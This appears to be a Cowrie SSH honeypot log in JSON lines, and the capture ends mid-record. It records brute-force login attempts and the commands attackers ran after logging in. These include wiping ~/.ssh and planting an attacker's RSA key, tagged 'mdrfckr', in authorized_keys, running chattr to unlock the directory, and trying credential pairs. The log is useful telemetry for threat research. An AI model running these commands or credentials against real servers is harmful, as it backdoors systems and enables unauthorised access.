{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:11:56.728947Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:11:57.008467Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:11:57.009360Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":35400,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1957efdb784","protocol":"ssh","message":"New connection: 129.226.183.73:35400 (1.2.3.4:22) [session: b1957efdb784]","sensor":"my-vps","timestamp":"2025-08-24T21:11:57.264004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:11:57.267163Z","src_ip":"129.226.183.73","session":"b1957efdb784"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:11:57.527397Z","src_ip":"129.226.183.73","session":"b1957efdb784"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:11:58.577353Z","src_ip":"129.226.183.73","session":"b1957efdb784"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:11:59.840734Z","src_ip":"129.226.183.73","session":"b1957efdb784"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":36848,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f3fec91a260","protocol":"ssh","message":"New connection: 129.226.183.73:36848 (1.2.3.4:22) [session: 5f3fec91a260]","sensor":"my-vps","timestamp":"2025-08-24T21:12:00.097409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:12:00.102273Z","src_ip":"129.226.183.73","session":"5f3fec91a260"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:12:00.363430Z","src_ip":"129.226.183.73","session":"5f3fec91a260"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:12:01.421913Z","src_ip":"129.226.183.73","session":"5f3fec91a260"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:12:01.690390Z","src_ip":"129.226.183.73","session":"5f3fec91a260"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:12:01.691496Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.session.closed","duration":"228.5","message":"Connection lost after 228.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:12:33.050827Z","src_ip":"60.221.239.232","session":"3b3578eab47e"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":59548,"dst_ip":"1.2.3.4","dst_port":22,"session":"5180ea9bf682","protocol":"ssh","message":"New connection: 129.226.183.73:59548 (1.2.3.4:22) [session: 5180ea9bf682]","sensor":"my-vps","timestamp":"2025-08-24T21:13:06.088966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:13:06.090426Z","src_ip":"129.226.183.73","session":"5180ea9bf682"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:13:06.366879Z","src_ip":"129.226.183.73","session":"5180ea9bf682"}
{"eventid":"cowrie.login.failed","username":"default","password":"default","message":"login attempt [default/default] failed","sensor":"my-vps","timestamp":"2025-08-24T21:13:07.455591Z","src_ip":"129.226.183.73","session":"5180ea9bf682"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:13:08.733126Z","src_ip":"129.226.183.73","session":"5180ea9bf682"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":56724,"dst_ip":"1.2.3.4","dst_port":22,"session":"851b13a894db","protocol":"ssh","message":"New connection: 129.226.183.73:56724 (1.2.3.4:22) [session: 851b13a894db]","sensor":"my-vps","timestamp":"2025-08-24T21:14:12.142923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:14:12.144369Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:14:12.400761Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.login.success","username":"root","password":"adrian","message":"login attempt [root/adrian] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:14:13.441075Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:14:13.973487Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:14:13.974211Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:14:13.975320Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:14:14.236608Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:14:14.861289Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:14:14.862006Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:14:15.126641Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:14:15.127682Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":58014,"dst_ip":"1.2.3.4","dst_port":22,"session":"34d10a558277","protocol":"ssh","message":"New connection: 129.226.183.73:58014 (1.2.3.4:22) [session: 34d10a558277]","sensor":"my-vps","timestamp":"2025-08-24T21:14:15.386140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:14:15.387115Z","src_ip":"129.226.183.73","session":"34d10a558277"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:14:15.654310Z","src_ip":"129.226.183.73","session":"34d10a558277"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:14:16.702648Z","src_ip":"129.226.183.73","session":"34d10a558277"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:14:17.972938Z","src_ip":"129.226.183.73","session":"34d10a558277"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":59288,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae0d1886b9a7","protocol":"ssh","message":"New connection: 129.226.183.73:59288 (1.2.3.4:22) [session: ae0d1886b9a7]","sensor":"my-vps","timestamp":"2025-08-24T21:14:18.239846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:14:18.240749Z","src_ip":"129.226.183.73","session":"ae0d1886b9a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:14:18.509110Z","src_ip":"129.226.183.73","session":"ae0d1886b9a7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:14:19.621385Z","src_ip":"129.226.183.73","session":"ae0d1886b9a7"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:14:19.892583Z","src_ip":"129.226.183.73","session":"851b13a894db"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:14:19.893762Z","src_ip":"129.226.183.73","session":"ae0d1886b9a7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63372,"dst_ip":"1.2.3.4","dst_port":22,"session":"691f72d8fe5a","protocol":"ssh","message":"New connection: 217.72.205.35:63372 (1.2.3.4:22) [session: 691f72d8fe5a]","sensor":"my-vps","timestamp":"2025-08-24T21:15:15.820891Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:15:15.822498Z","src_ip":"217.72.205.35","session":"691f72d8fe5a"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":53922,"dst_ip":"1.2.3.4","dst_port":22,"session":"6422f3f583e3","protocol":"ssh","message":"New connection: 129.226.183.73:53922 (1.2.3.4:22) [session: 6422f3f583e3]","sensor":"my-vps","timestamp":"2025-08-24T21:15:28.866289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:15:28.873186Z","src_ip":"129.226.183.73","session":"6422f3f583e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:15:29.143821Z","src_ip":"129.226.183.73","session":"6422f3f583e3"}
{"eventid":"cowrie.login.failed","username":"odoo17","password":"odoo17","message":"login attempt [odoo17/odoo17] failed","sensor":"my-vps","timestamp":"2025-08-24T21:15:30.243478Z","src_ip":"129.226.183.73","session":"6422f3f583e3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:15:31.520743Z","src_ip":"129.226.183.73","session":"6422f3f583e3"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":43778,"dst_ip":"1.2.3.4","dst_port":22,"session":"d72d42c06cd0","protocol":"ssh","message":"New connection: 60.221.239.232:43778 (1.2.3.4:22) [session: d72d42c06cd0]","sensor":"my-vps","timestamp":"2025-08-24T21:15:42.035292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:15:42.036001Z","src_ip":"60.221.239.232","session":"d72d42c06cd0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","di